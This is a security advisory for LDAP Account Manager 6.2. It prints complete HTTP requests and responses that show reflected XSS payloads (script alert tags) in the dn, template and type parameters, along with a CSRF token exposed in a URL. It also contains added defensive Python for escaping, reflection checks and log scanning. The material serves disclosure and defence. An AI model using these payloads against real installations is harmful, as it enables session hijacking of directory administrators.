Packet Storm: PACKETSTORM:146858

LDAP Account Manager 6.2 Cross Site Scripting

2018-03-22 00:00:00
Michal Kedzior
packetstormsecurity.com

EPSS: 0.005 (Low), percentile 75.6%

`Affected Software: LDAP Account Manager (6.2)  
Pentester: Michał Kędzior <michal[dot]kedzior147[at]gmail[dot]com>  
CVE: CVE-2018-8763, CVE-2018-8764  
  
Vulnerabilities:  
*****************  
  
1. Cross-site scripting (reflected) CVE-2018-8763:  
================================  
  
Risk: HIGH  
  
Summary:  
  
***********  
  
A reflected Cross-Site Scripting vulnerability was found during the  
test. It allows injecting and executing JavaScript code in the  
application context. The JavaScript code is only reflected by the server, which  
differs from stored Cross-Site Scripting, where the code is stored in the  
application permanently. This vulnerability is mostly exploited to  
hijack authenticated users' sessions. It can also be used to redirect users  
to malicious websites or to steal application users' keystrokes.  
  
Proof:  
  
*******  
  
I. Vulnerable parameter dn:  
  
=====================  
  
Request with payload [%3cscript%3ealert(document.domain)%3c%2fscript%3e]:  
  
GET /lam/templates/3rdParty/pla/htdocs/cmd.php?cmd=add_attr_form&server_id=1&dn=cn%3xxxxx%2cou%3dpeople%2cdc%3dpl%2cdc%3ds2-eu%2cdc%3dxxxx%2cdc%3dlocalru0bz%3cscript%3ealert(document.domain)%3c%2fscript%3eu89iu HTTP/1.1  
  
Host: XXXXXXXXXX  
  
Accept-Encoding: gzip, deflate  
  
Accept: */*  
  
Accept-Language: en  
  
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;  
Trident/5.0)  
  
Connection: close  
  
Referer: XXXXXXXXX  
  
Cookie: XXXXXXXXXX  
  
  
Response with execution point [<script>alert(document.domain)</script>]:  
  
HTTP/1.1 200 OK  
  
Cache-Control: no-store, no-cache, must-revalidate  
  
Content-Length: 12887  
  
Content-Security-Policy: frame-ancestors 'self'  
  
Content-Type: text/html; charset="UTF-8"  
  
Date: Fri, 02 Mar 2018 09:52:18 GMT  
  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
  
Pragma: no-cache  
  
Server: Apache/2.4.29 (Debian)  
  
Vary: Accept-Encoding  
  
X-Frame-Options: sameorigin  
  
Connection: close  
  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "  
http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">  
  
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="auto">  
  
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"  
/><title>LDAP Account Manager (6.2) - </title><link rel="shortcut icon"  
href="images/favicon.ico" type="image/vnd.microsoft.icon" /><link  
type="text/css" rel="stylesheet" href="css/default/style.css" /><link  
type="text/css" rel="stylesheet" media="all"  
href="js/jscalendar/calendar-blue.css"  
title="blue" />  
  
<script type="text/javascript" src="js/ajax_functions.js"></script><script  
type="text/javascript" src="js/jscalendar/calendar.js"></script>  
  
</head>  
  
[a|]  
  
</div></td><td class="body" style="width: 80%;"><div id="ajBODY">  
  
<table class="sysmsg"><tr><td class="icon" rowspan="2"><img  
src="images/default/error-big.png" alt="error" /></td><td  
class="head">Error</td></tr><tr><td class="body">The entry  
(cn=xxxxx,ou=people,dc=pl,dc=s2-eu,dc=xxxx,dc=localru0bz<  
script>alert(document.domain)</script>u89iu) does not  
exist.</td></tr></table>  
  
<table class="body"><tr><td></td></tr></table></div></td></tr>  
  
</table></body></html>  
  
  
  
II. Vulnerable parameter template:  
  
========================  
  
Request with payload [%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e]:  
  
GET /lam/templates/3rdParty/pla/htdocs/cmd.php?cmd=rename_form&server_id=1&dn=cn%3Dtechnic%2Cou%3Dpeople%2Cdc%3Dpl%2Cdc%3Ds2-eu%2Cdc%3Dxxxx%2Cdc%3Dlocal&template=noneuaax6%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ev7rfn HTTP/1.1  
  
Host: xxxxxxx  
  
Accept-Encoding: gzip, deflate  
  
Accept: */*  
  
Accept-Language: en  
  
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;  
Trident/5.0)  
  
Connection: close  
  
  
Response with execution point ["><script>alert(document.domain)</script>]:  
  
HTTP/1.1 200 OK  
  
Cache-Control: no-store, no-cache, must-revalidate  
  
Content-Length: 22141  
  
Content-Security-Policy: frame-ancestors 'self'  
  
Content-Type: text/html; charset="UTF-8"  
  
Date: Fri, 02 Mar 2018 11:22:27 GMT  
  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
  
Pragma: no-cache  
  
Server: Apache/2.4.29 (Debian)  
  
Vary: Accept-Encoding  
  
X-Frame-Options: sameorigin  
  
Connection: close  
  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "  
http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">  
  
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="auto">  
  
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"  
/><title>LDAP Account Manager (6.2) -  
cn=technic,ou=people,dc=pl,dc=s2-eu,dc=xxxx,dc=local  
</title><link rel="shortcut icon" href="images/favicon.ico"  
type="image/vnd.microsoft.icon" /><link type="text/css" rel="stylesheet"  
href="css/default/style.css" /><link type="text/css" rel="stylesheet"  
media="all" href="js/jscalendar/calendar-blue.css" title="blue" />  
  
<script type="text/javascript" src="js/ajax_functions.js"></script><script  
type="text/javascript" src="js/jscalendar/calendar.js"></script>  
  
</head>  
  
[a|]  
  
</div></td><td class="body" style="width: 80%;"><div id="ajBODY">  
  
<table class="body"><tr><td><h3 class="title">Rename  
<b>cn=technic</b></h3><h3 class="subtitle">DN:  
<b>cn=technic,ou=people,dc=pl,dc=s2-eu,dc=xxx,dc=local</b></h3><center>Rename  
<b>cn=technic</b> to a new object.<br /><br /><form  
action="cmd.php?cmd=rename" method="post" /><input type="hidden"  
name="server_id" value="1" /><input type="hidden" name="dn"  
value="cn%3Dtechnic%2Cou%3Dpeople%2Cdc%3Dpl%2Cdc%3Ds2-eu%2Cdc%3Dxxxx%2Cdc%3Dlocal"  
/><input type="hidden" name="template" value="noneuaax6"><script>  
alert(document.domain)</script>v7rfn" /><input type="text" name="new_rdn"  
size="30" value="cn=technic" /><input type="submit" value="Rename"  
/></form></center>  
  
</td></tr></table></div></td></tr>  
  
</table></body></html>  
  
  
  
III. Vulnerable parameter type:  
  
=====================  
  
Request with payload [%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e]:  
  
GET /lam/templates/upload/masscreate.php?type=userawvpj%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ev0car HTTP/1.1  
  
Host: xxxxx  
  
Accept-Encoding: gzip, deflate  
  
Accept: */*  
  
Accept-Language: en  
  
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;  
Trident/5.0)  
  
Connection: close  
  
Referer: xxxxxx  
  
Cookie: xxxxxx  
  
Response with execution point ["><script>alert(document.domain)</script>]:  
  
HTTP/1.1 200 OK  
  
Cache-Control: no-store, no-cache, must-revalidate  
  
Content-Length: 8418  
  
Content-Security-Policy: frame-ancestors 'self'  
  
Content-Type: text/html; charset=UTF-8  
  
Date: Fri, 02 Mar 2018 11:10:05 GMT  
  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
  
Pragma: no-cache  
  
Server: Apache/2.4.29 (Debian)  
  
Vary: Accept-Encoding  
  
X-Frame-Options: sameorigin  
  
Connection: close  
  
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "  
http://www.w3.org/TR/html4/loose.dtd">  
  
<html>  
  
<head>  
  
<meta http-equiv="content-type" content="text/html; charset=UTF-8">  
  
<meta http-equiv="pragma" content="no-cache">  
  
<meta http-equiv="cache-control" content="no-cache"><link rel="shortcut  
icon" type="image/x-icon" href="../../graphics/favicon.ico">  
  
<link rel="icon" href="../../graphics/logo136.png">  
  
<title>LDAP Account Manager (directoryservice:389)</title>  
  
[a|]  
  
<div class="userawvpj"><script>alert(document.domain)</script>v0car-bright  
smallPaddingContent"><div class="title">  
  
<h2 class="titleText">Account creation via file upload</h2>  
  
</div><p>&nbsp;</p>  
  
<p>  
  
Here you can create multiple accounts by providing a CSV file.</p>  
  
<p>&nbsp;</p>  
  
<form enctype="multipart/form-data" action="masscreate.php" method="post">  
  
<table>  
  
<tr>  
  
<td >  
  
<div class="nowrap">Account type</div>  
  
</td>  
  
<td>  
  
<select class="ui-corner-all" name="type" id="type" size="1"  
onchange="changeVisibleModules(this);"  
tabindex="1">  
  
<option value="group">Groups</option>  
  
<option value="user">Users</option>  
  
</select>  
  
</td>  
  
[a|]  
  
Remediation:  
  
***************  
These vulnerabilities have been fixed by the vendor in version 6.3.  
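The three proofs above show the same defect in three output contexts: `dn` lands in an HTML text node, `template` inside a double-quoted attribute value and `type` inside a `class` attribute. The following is an added example, not LAM's code and not part of the advisory: hypothetical renderers reproduce the shape of the quoted response fragments, first interpolating raw input and then HTML-encoding it with `html.escape(..., quote=True)` (assumed here as the Python equivalent of PHP's `htmlspecialchars` with `ENT_QUOTES`). It also implements the marker technique visible in the proofs (the random `ru0bz...u89iu` style prefix and suffix around the payload), which lets a regression check locate exactly where input lands and tell an unencoded reflection from an encoded one, even in a page that legitimately contains its own `<script>` tags.

```python
"""Added example (not LAM's code): the three reflection points from the advisory,
vulnerable and fixed, plus a marker-based check for unencoded reflection."""
import html
import re
import secrets

# Constructed payloads modelled on the advisory's proofs: a text-node payload for `dn`,
# an attribute-breakout payload for `template` and `type`.
TEXT_PAYLOAD = "<script>alert(document.domain)</script>"
ATTR_PAYLOAD = '"><script>alert(document.domain)</script>'


def esc(value):
    """Escape &, <, >, " and '. Quote escaping is what stops an attribute value from
    being terminated early; it is the part htmlspecialchars() without ENT_QUOTES misses
    for single quotes."""
    return html.escape(value, quote=True)


# Hypothetical renderers reproducing the quoted response fragments. The *_vulnerable
# versions interpolate raw input; the *_fixed versions encode it first.
def error_vulnerable(dn):
    return f'<td class="body">The entry ({dn}) does not exist.</td>'


def error_fixed(dn):
    return f'<td class="body">The entry ({esc(dn)}) does not exist.</td>'


def template_vulnerable(template):
    return f'<input type="hidden" name="template" value="{template}" />'


def template_fixed(template):
    return f'<input type="hidden" name="template" value="{esc(template)}" />'


def type_vulnerable(type_):
    return f'<div class="{type_}-bright smallPaddingContent">'


def type_fixed(type_):
    return f'<div class="{esc(type_)}-bright smallPaddingContent">'


def wrap_with_markers(payload):
    """Surround the payload with random hex markers so its reflection can be located
    exactly, as the advisory's proofs do with random alphanumerics."""
    prefix, suffix = secrets.token_hex(3), secrets.token_hex(3)
    return prefix, prefix + payload + suffix, suffix


def reflected_verbatim(body, prefix, suffix, payload):
    """True when the text between the markers equals the payload byte-for-byte, i.e. it
    came back without encoding. An encoded reflection (&lt;script&gt;...) gives False."""
    m = re.search(re.escape(prefix) + "(.*?)" + re.escape(suffix), body, re.DOTALL)
    return m is not None and m.group(1) == payload


def audit(renderers):
    """Run each renderer on its payload; True means the payload survived unencoded."""
    report = {}
    for name, (render, payload) in renderers.items():
        prefix, marked, suffix = wrap_with_markers(payload)
        report[name] = reflected_verbatim(render(marked), prefix, suffix, payload)
    return report


RENDERERS = {
    "dn/vulnerable": (error_vulnerable, TEXT_PAYLOAD),
    "dn/fixed": (error_fixed, TEXT_PAYLOAD),
    "template/vulnerable": (template_vulnerable, ATTR_PAYLOAD),
    "template/fixed": (template_fixed, ATTR_PAYLOAD),
    "type/vulnerable": (type_vulnerable, ATTR_PAYLOAD),
    "type/fixed": (type_fixed, ATTR_PAYLOAD),
}

if __name__ == "__main__":
    for name, unencoded in audit(RENDERERS).items():
        print(f"{name:20s} {'REFLECTED UNENCODED' if unencoded else 'encoded'}")
```

The same `reflected_verbatim` check, run against the body of a real response from a patched 6.3 install with a marked payload in `dn`, `template` or `type`, is a cheap regression test that the encoding stayed in place.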
  
  
  
2. CSRF token in URL CVE-2018-8764  
  
=================  
  
Risk: LOW  
  
  
Summary:  
  
************  
  
Sensitive information within URLs may be logged in various locations,  
including the user's browser, the web server, and any forward or reverse  
proxy servers between the two endpoints. URLs may also be displayed  
on-screen, bookmarked or emailed around by users. They may be disclosed to  
third parties via the Referer header when any off-site links are followed.  
Placing session tokens into the URL increases the risk that they will be  
captured by an attacker.  
  
Proof:  
  
*******  
  
Request which reveals the CSRF token [sec_token=1045368361844]:  
  
GET /lam/templates/misc/ajax.php?function=passwordChange&sec_token=1045368361844 HTTP/1.1  
  
Host: xxxx  
  
Accept-Encoding: gzip, deflate  
  
Accept: */*  
  
Accept-Language: en  
  
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;  
Trident/5.0)  
  
Connection: close  
  
Referer: xxxxx  
  
Cookie: xxxxxx  
  
  
Remediation:  
  
***************  
  
This vulnerability has been fixed by the vendor in version 6.3.  
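The summary above lists where a token in a URL ends up: server logs, proxies and Referer headers. The following added example, not part of the advisory and not LAM's code, makes that concrete from the defender's side: it sweeps Apache combined-format access log lines (the format is assumed; the sample lines are constructed from the requests quoted in this advisory, with invented client addresses, timestamps and the hostname `lam.example`) and reports three things: a `sec_token` value logged in a request URL, a `sec_token` value logged in a Referer, and tag-like markup decoded out of the `dn`, `template` or `type` parameters of the two affected scripts. It also shows a log-redaction stopgap for the token until the upgrade to 6.3 is done.

```python
"""Added example (not part of the advisory or of LAM): an access-log sweep for the
CSRF token leaking into URLs/Referers and for reflected-XSS probes against the
affected LAM parameters, plus token redaction for log hygiene."""
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log format (assumed). Field names are this example's own.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Parameters the advisory reports as reflected without encoding, keyed by script path.
WATCHED_PARAMS = {
    "/lam/templates/3rdParty/pla/htdocs/cmd.php": {"dn", "template"},
    "/lam/templates/upload/masscreate.php": {"type"},
}
TOKEN_PARAM = "sec_token"

# Tag-like markup, a javascript: URL or an on*= handler inside a decoded value.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z]|javascript:|\bon[a-z]+\s*=", re.IGNORECASE)
# The token value as it appears in a request target or a Referer.
TOKEN_RE = re.compile(r'(%s=)[^&\s"]+' % TOKEN_PARAM)


def decoded_params(target):
    """Split a request target into its path and URL-decoded query parameters."""
    parts = urlsplit(target)
    return parts.path, parse_qs(parts.query, keep_blank_values=True)


def scan_line(line):
    """Return (kind, detail) findings for one log line; an unparsable line yields []."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    path, params = decoded_params(m["target"])
    for name in sorted(WATCHED_PARAMS.get(path, set())):
        for value in params.get(name, []):
            if MARKUP_RE.search(value):
                findings.append(("xss-probe", f"{path} {name}={value!r}"))
    if TOKEN_PARAM in params:
        findings.append(("token-in-url", m["target"]))
    if TOKEN_RE.search(m["referer"]):
        findings.append(("token-in-referer", m["referer"]))
    return findings


def scan_log(lines):
    """Scan many lines; returns (1-based line number, kind, detail) tuples."""
    return [(n, kind, detail)
            for n, line in enumerate(lines, 1)
            for kind, detail in scan_line(line)]


def redact_token(line):
    """Mask the token value wherever it appears in a log line. This is log hygiene
    only; the real fix is not carrying the token in the URL at all."""
    return TOKEN_RE.sub(r"\1[REDACTED]", line)


# Constructed sample log lines modelled on the advisory's requests.
SAMPLE_LOG = [
    '10.0.0.5 - - [02/Mar/2018:09:52:18 +0000] "GET /lam/templates/3rdParty/pla/htdocs/cmd.php'
    '?cmd=add_attr_form&server_id=1&dn=cn%3dtest%2cou%3dpeople%3cscript%3ealert(document.domain)'
    '%3c%2fscript%3e HTTP/1.1" 200 12887 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [02/Mar/2018:11:10:05 +0000] "GET /lam/templates/upload/masscreate.php'
    '?type=user%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e HTTP/1.1" 200 8418 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [02/Mar/2018:12:00:00 +0000] "GET /lam/templates/misc/ajax.php'
    '?function=passwordChange&sec_token=1045368361844 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [02/Mar/2018:12:00:30 +0000] "GET /lam/templates/lists/list.php?type=user HTTP/1.1" '
    '200 9000 "https://lam.example/lam/templates/misc/ajax.php?function=passwordChange'
    '&sec_token=1045368361844" "Mozilla/5.0"',
    '10.0.0.9 - - [02/Mar/2018:12:01:00 +0000] "GET /lam/templates/lists/list.php?type=user HTTP/1.1" '
    '200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, kind, detail in scan_log(SAMPLE_LOG):
        print(f"line {n}: {kind}: {detail}")
    print(redact_token(SAMPLE_LOG[2]))
```

Line 4 of the sample is the case the summary describes: the token never appears in that request's own URL, yet it is logged anyway because the browser sent the previous page's URL as the Referer.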
  
  
`
